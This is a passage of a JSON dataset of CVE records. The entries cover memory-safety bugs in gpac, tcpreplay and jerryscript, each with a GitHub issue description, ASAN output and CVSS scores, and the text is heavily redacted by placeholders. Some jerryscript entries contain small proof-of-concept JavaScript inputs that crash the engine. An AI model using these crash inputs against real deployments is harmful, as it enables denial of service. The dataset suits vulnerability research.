  55427. "description": "Heap buffer overflow in APITAG odf_code.c. y] I looked for a similar issue and couldn't find any. [ y] I tried with the latest version of GPAC. Installers available at URLTAG [ y] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command line ...). I can share files anonymously with this dropbox: URLTAG Describe the bug A heap based buffer overflow was discovered in libgpac. The issue is being triggered in the function APITAG at odf_code.c To Reproduce Steps to reproduce the behavior NUMBERTAG Compile according to the default configuration APITAG NUMBERTAG execute command APITAG [poc URLTAG can be found here. Expected behavior An attacker can exploit this vulnerability by submitting a malicious media file that exploits this issue. This will result in a Denial of Service APITAG and potentially Information Exposure when the application attempts to process the file. Screenshots ASAN Reports ERRORTAG System (please complete the following information): OS version : Ubuntu NUMBERTAG GPAC Version : GPAC NUMBERTAG e NUMBERTAG d NUMBERTAG d master branch",
  55428. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  55429. "severity": "MEDIUM",
  55430. "baseScore": 5.5,
  55431. "impactScore": 3.6,
  55432. "exploitabilityScore": 1.8
  55433. },
  55434. {
  55435. "CVE_ID": "CVE-2020-23267",
  55436. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1479",
  55437. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1479",
  55438. "Repo_new": "gpac/gpac",
  55439. "Issue_Created_At": "2020-05-12T16:22:14Z",
  55440. "description": "Heap buffer overflow in APITAG in APITAG y] I looked for a similar issue and couldn't find any. [ y] I tried with the latest version of GPAC. Installers available at URLTAG [ y] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command line ...). I can share files anonymously with this dropbox: URLTAG Describe the bug A heap based buffer overflow was discovered in libgpac, during the pointer ptr points to the wrong memory area operation. The issue is being triggered in the function APITAG at isom_hinter_track_process.c. To Reproduce Steps to reproduce the behavior NUMBERTAG Compile tcpreplay according to the default configuration ERRORTAG NUMBERTAG execute command APITAG [poc URLTAG can be found here. Expected behavior An attacker can exploit this vulnerability by submitting a malicious media file that exploits this issue. This will result in a Denial of Service APITAG and potentially Information Exposure when the application attempts to process the file. Screenshots ASAN Reports ERRORTAG Possible causes of vulnerabilities is in the function APITAG at isom_hinter_track_process.c. CODETAG System (please complete the following information): OS version : Ubuntu NUMBERTAG GPAC Version : GPAC NUMBERTAG e NUMBERTAG d NUMBERTAG d master branch",
  55441. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  55442. "severity": "HIGH",
  55443. "baseScore": 7.1,
  55444. "impactScore": 5.2,
  55445. "exploitabilityScore": 1.8
  55446. },
  55447. {
  55448. "CVE_ID": "CVE-2020-23269",
  55449. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1482",
  55450. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1482",
  55451. "Repo_new": "gpac/gpac",
  55452. "Issue_Created_At": "2020-05-13T01:17:29Z",
  55453. "description": "Heap buffer overflow APITAG in APITAG y] I looked for a similar issue and couldn't find any. [ y] I tried with the latest version of GPAC. Installers available at URLTAG [ y] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command line ...). I can share files anonymously with this dropbox: URLTAG Describe the bug A heap based buffer overflow was discovered in libgpac, during structure APITAG 'stsz' member 'sizes' points to an invalid address. The issue is being triggered in the function APITAG at isomedia/stbl_read.c To Reproduce Steps to reproduce the behavior NUMBERTAG Compile according to the default configuration APITAG NUMBERTAG execute command APITAG [poc URLTAG can be found here. Expected behavior An attacker can exploit this vulnerability by submitting a malicious media file that exploits this issue. This will result in a Denial of Service APITAG and potentially Information Exposure when the application attempts to process the file. Screenshots ASAN Reports ERRORTAG Possible causes of vulnerabilities structure APITAG 'stsz' member 'sizes' points to an invalid address CODETAG System (please complete the following information): OS version : Ubuntu NUMBERTAG GPAC Version : GPAC NUMBERTAG e NUMBERTAG d NUMBERTAG d master branch",
  55454. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  55455. "severity": "MEDIUM",
  55456. "baseScore": 5.5,
  55457. "impactScore": 3.6,
  55458. "exploitabilityScore": 1.8
  55459. },
  55460. {
  55461. "CVE_ID": "CVE-2020-23273",
  55462. "Issue_Url_old": "https://github.com/appneta/tcpreplay/issues/579",
  55463. "Issue_Url_new": "https://github.com/appneta/tcpreplay/issues/579",
  55464. "Repo_new": "appneta/tcpreplay",
  55465. "Issue_Created_At": "2020-05-19T15:57:25Z",
  55466. "description": "Bug] tcpreplay edit \u2014\u2014heap buffer overflow in randomize_iparp at APITAG Describe the bug A heap based buffer overflow was discovered in tcpreplay edit binary, during the pointer 'ip' dereference operation. The issue is being triggered in the function randomize_iparp at APITAG To Reproduce Steps to reproduce the behavior NUMBERTAG Compile tcpreplay according to the default configuration APITAG NUMBERTAG execute command APITAG [poc URLTAG can be found here. Expected behavior An attacker can exploit this vulnerability by submitting a malicious pcap that exploits this issue. This will result in a Denial of Service APITAG potentially Information Exposure when the application attempts to process the file. Screenshots ASAN Reports ERRORTAG Debug CODETAG System (please complete the following information): OS version : Ubuntu NUMBERTAG Tcpreplay Version NUMBERTAG master branch",
  55467. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  55468. "severity": "MEDIUM",
  55469. "baseScore": 5.5,
  55470. "impactScore": 3.6,
  55471. "exploitabilityScore": 1.8
  55472. },
  55473. {
  55474. "CVE_ID": "CVE-2020-23302",
  55475. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/3748",
  55476. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/3748",
  55477. "Repo_new": "jerryscript-project/jerryscript",
  55478. "Issue_Created_At": "2020-05-17T03:19:15Z",
  55479. "description": "heap use after free in the ecma_ref_ecma_string. APITAG revision bd1c4df Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps python PATHTAG clean debug compile flag= fsanitize=address compile flag= m NUMBERTAG compile flag= fno omit frame pointer compile flag= fno common lto=off error message=on system allocator=on Test case var o = [] function add(i) { delete o[i NUMBERTAG new APITAG '\"\\\\u', ], APITAG } for (var i NUMBERTAG i APITAG NUMBERTAG ec NUMBERTAG b0: fa fa fa fa fa fa[fd]fd fa fa fd fa fa fa fd fa NUMBERTAG ec NUMBERTAG c0: fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa fa fd fd NUMBERTAG ec NUMBERTAG d0: fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG ec NUMBERTAG e0: fa fa fd fa fa fa fd fa fa fa fd fd fa fa fd fd NUMBERTAG ec NUMBERTAG f0: fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG ec NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING",
  55480. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  55481. "severity": "CRITICAL",
  55482. "baseScore": 9.8,
  55483. "impactScore": 5.9,
  55484. "exploitabilityScore": 3.9
  55485. },
  55486. {
  55487. "CVE_ID": "CVE-2020-23303",
  55488. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/3749",
  55489. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/3749",
  55490. "Repo_new": "jerryscript-project/jerryscript",
  55491. "Issue_Created_At": "2020-05-17T04:04:34Z",
  55492. "description": "heap buffer overflow in the jmem_pools_collect_empty. APITAG revision bd1c4df Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps python PATHTAG clean debug compile flag= fsanitize=address compile flag= m NUMBERTAG compile flag= fno omit frame pointer compile flag= fno common lto=off error message=on system allocator=on Test case try { [].length = { APITAG APITAG { return APITAG NUMBERTAG ubad\"', '\"\\\\u', new APITAG NUMBERTAG APITAG NUMBERTAG APITAG APITAG } } assert (false); } catch (e) { APITAG (\"function APITAG { return NUMBERTAG this); } Output Script Error: ERRORTAG Invalid argument type. APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG f NUMBERTAG at pc NUMBERTAG c bp NUMBERTAG fff4f NUMBERTAG sp NUMBERTAG fff4f NUMBERTAG READ of size NUMBERTAG at NUMBERTAG f NUMBERTAG thread T NUMBERTAG b in jmem_pools_collect_empty PATHTAG NUMBERTAG f NUMBERTAG in jmem_pools_finalize PATHTAG NUMBERTAG f in jmem_finalize PATHTAG NUMBERTAG d6a6 in jerry_cleanup PATHTAG NUMBERTAG b NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG in __libc_start_main ( PATHTAG NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region NUMBERTAG f NUMBERTAG f NUMBERTAG allocated by thread T0 here NUMBERTAG f7a NUMBERTAG dee in malloc ( PATHTAG NUMBERTAG b in jmem_heap_alloc PATHTAG NUMBERTAG eb in jmem_heap_gc_and_alloc_block PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG b in jmem_pools_alloc PATHTAG NUMBERTAG c NUMBERTAG in ecma_alloc_number PATHTAG NUMBERTAG c in ecma_create_float_number PATHTAG NUMBERTAG fc4 in ecma_copy_value PATHTAG NUMBERTAG in ecma_fast_copy_value PATHTAG NUMBERTAG f NUMBERTAG in ecma_op_object_find_own PATHTAG NUMBERTAG a NUMBERTAG in APITAG PATHTAG NUMBERTAG a NUMBERTAG in ecma_op_object_get PATHTAG NUMBERTAG a NUMBERTAG in APITAG PATHTAG NUMBERTAG c8d NUMBERTAG in APITAG PATHTAG NUMBERTAG c8ed9 in APITAG PATHTAG NUMBERTAG cd NUMBERTAG a in APITAG PATHTAG NUMBERTAG aa NUMBERTAG in ecma_builtin_dispatch_routine PATHTAG NUMBERTAG abac in ecma_builtin_dispatch_call PATHTAG NUMBERTAG dce in ecma_op_function_call_simple PATHTAG NUMBERTAG in ecma_op_function_call PATHTAG NUMBERTAG c NUMBERTAG f in APITAG PATHTAG NUMBERTAG cd4d5 in APITAG PATHTAG NUMBERTAG aa NUMBERTAG in ecma_builtin_dispatch_routine PATHTAG NUMBERTAG abac in ecma_builtin_dispatch_call PATHTAG NUMBERTAG dce in ecma_op_function_call_simple PATHTAG NUMBERTAG in ecma_op_function_call PATHTAG NUMBERTAG f8 in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG bc NUMBERTAG in ecma_op_object_default_value PATHTAG NUMBERTAG b5 in ecma_op_to_primitive PATHTAG NUMBERTAG c0 in ecma_op_to_string PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG jmem_pools_collect_empty Shadow bytes around the buggy address NUMBERTAG ebffff NUMBERTAG ec NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG ec NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG ec NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG ec NUMBERTAG fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fa NUMBERTAG ec NUMBERTAG fa fa fd fa fa fa fd fa fa fa NUMBERTAG fa[fa]fa fd fa NUMBERTAG ec NUMBERTAG fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd NUMBERTAG ec NUMBERTAG fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd NUMBERTAG ec NUMBERTAG fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fa NUMBERTAG ec NUMBERTAG fa fa fd fa fa fa fd fd fa fa fd fa fa fa fd fa NUMBERTAG ec NUMBERTAG fa fa fd fa fa fa fd fa fa fa fd fd fa fa fd fd Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING Credits: This vulnerability is detected by chong from OWL NUMBERTAG",
  55493. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  55494. "severity": "CRITICAL",
  55495. "baseScore": 9.8,
  55496. "impactScore": 5.9,
  55497. "exploitabilityScore": 3.9
  55498. },
  55499. {
  55500. "CVE_ID": "CVE-2020-23306",
  55501. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/3753",
  55502. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/3753",
  55503. "Repo_new": "jerryscript-project/jerryscript",
  55504. "Issue_Created_At": "2020-05-18T05:18:42Z",
  55505. "description": "stack overflow in ecma_regexp_match. APITAG revision bd1c4df Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps python PATHTAG clean debug compile flag= fsanitize=address compile flag= m NUMBERTAG compile flag= fno omit frame pointer compile flag= fno common lto=off error message=on system allocator=on Test case r = new APITAG APITAG ?)+?a\"); assert (r.exec(\"ba NUMBERTAG a\"); Output ASAN:SIGSEGV APITAG NUMBERTAG ERROR: APITAG stack overflow on address NUMBERTAG ff NUMBERTAG fcc (pc NUMBERTAG fc NUMBERTAG bp NUMBERTAG ff NUMBERTAG sp NUMBERTAG ff NUMBERTAG fb0 T NUMBERTAG fc NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG ee in ecma_regexp_match PATHTAG NUMBERTAG ee in ecma_regexp_match PATHTAG NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG ee in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match PATHTAG NUMBERTAG b NUMBERTAG in ecma_regexp_match 